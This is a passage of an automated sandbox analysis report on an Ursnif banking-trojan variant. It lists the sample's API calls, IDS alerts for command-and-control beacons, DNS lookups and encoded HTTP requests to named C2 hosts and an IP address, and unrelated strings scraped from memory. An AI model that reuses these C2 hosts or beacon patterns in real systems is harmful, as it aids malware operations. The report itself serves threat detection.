Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_0457A5F6
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,0_2_0457CC4A
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_0457198F
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_04580BC5
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_04BBCC4A
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_04BB198F
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_04BC0BC5
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,49_2_0097198F
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,49_2_00980BC5
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,49_2_0097CC4A

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49776 -> 194.147.86.221:80
                      Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49777 -> 194.147.86.221:80
                      Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49778 -> 194.147.86.221:80
                      Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49778 -> 194.147.86.221:80
                      Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49779 -> 194.147.86.221:80
                      Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49779 -> 194.147.86.221:80
                      Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49780 -> 194.147.86.221:80
                      Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49780 -> 194.147.86.221:80
                      Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49781 -> 194.147.86.221:80
                      Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49781 -> 194.147.86.221:80
                      Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49862 -> 194.147.86.221:80
                      Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49862 -> 194.147.86.221:80
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: init.icecreambob.com
                      Source: C:\Windows\explorer.exe | Domain query: art.microsoftsofymicrosoftsoft.at
                      Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 194.147.86.221 80
                      Uses nslookup.exe to query domains
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      May check the online IP address of the machine
                      Source: C:\Windows\System32\nslookup.exe | DNS query: name: myip.opendns.com
                      Source: C:\Windows\System32\nslookup.exe | DNS query: name: myip.opendns.com
                      Source: global traffic | HTTP traffic detected: GET /HKPpcwlwrfQkTmv8P06H/3Wxv_2FnSDQGUBdPXw9/RYY8q690tWMw7_2FqiZKDR/tihJyHYSdUWc_/2Bk0Blz4/Ugw940qxXbfuHBW4kjFJy7m/qeLyDgVQe2/v1ANC_2B2jNzm_2B0/UCUkcrNLM1Qj/GKGs5Yns4a1/y2RcxBlEBBMDgc/vui4nnWlDWEvxcnjXpxFk/PDKIsTs7GBXCyaSr/TwT_2BF1pJMPI8c/ynG0YGZIeokgeQwjHf/KZMBUT4_2/BvirsVJDlpOpDnwD83YS/kQDSJlsGXWqTNVyxDqs/KuldZQ_2BlbTtmbV3TyeLX/ai8Q6i HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
                      Source: global traffic | HTTP traffic detected: GET /FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
                      Source: global traffic | HTTP traffic detected: GET /og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
                      Source: global traffic | HTTP traffic detected: GET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
                      Source: global traffic | HTTP traffic detected: GET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
                      Source: global traffic | HTTP traffic detected: GET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: init.icecreambob.com
                      Source: global traffic | HTTP traffic detected: GET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: art.microsoftsofymicrosoftsoft.at
                      Source: global traffic | HTTP traffic detected: POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Content-Length: 2 | Host: art.microsoftsofymicrosoftsoft.at
                      Source: Joe Sandbox View | ASN Name: NETRACK-ASRU NETRACK-ASRU
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: rundll32.exe, 00000003.00000003.841471789.0000000000AE2000.00000004.00000001.sdmp | String found in binary or memory: http://init.icecreambob.com/
                      Source: rundll32.exe, 00000003.00000003.826552250.0000000000AE2000.00000004.00000001.sdmp | String found in binary or memory: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm
                      Source: rundll32.exe, 00000003.00000003.831975638.0000000000AF4000.00000004.00000001.sdmp | String found in binary or memory: http://init.icecreambob.com/l
                      Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp | String found in binary or memory: http://init.icecreambob.com/lbK
                      Source: rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp | String found in binary or memory: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.cmg
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.co/xa
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobe.ux
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp | String found in binary or memory: http://ns.adobp/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp | String found in binary or memory: http://ns.micro/1
                      Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 0000000F.00000002.963606313.0000029E48941000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.935740628.0000026442311000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmp | String found in binary or memory: http://twitter.com/spotify:
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsW~
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/termsofservice
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/contact/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/parents/
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp | String found in binary or memory: https://en.help.roblox.com/hc/en-us
                      Source: powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/develop
                      Source: RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/info/privacy
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknown | DNS traffic detected: queries for: init.icecreambob.com
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 06 Oct 2021 23:34:10 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Vary: Accept-Encoding | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.twitter.com (Twitter)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.youtube.com (Youtube)
                      Source: RuntimeBroker.exe, 0000002E.00000002.1187598445.000001B4FB0D0000.00000004.00000001.sdmp | String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000002.1187598445.000001B4FB0D0000.00000004.00000001.sdmp | String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.twitter.com (Twitter)
                      Source: RuntimeBroker.exe, 0000002E.00000000.997126395.000001B4FB0C4000.00000004.00000001.sdmp | String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000000.997126395.000001B4FB0C4000.00000004.00000001.sdmp | String found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.twitter.com (Twitter)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | String found in binary or memory: Find us: www.facebook.com/HiddenCityGame equals www.facebook.com (Facebook)
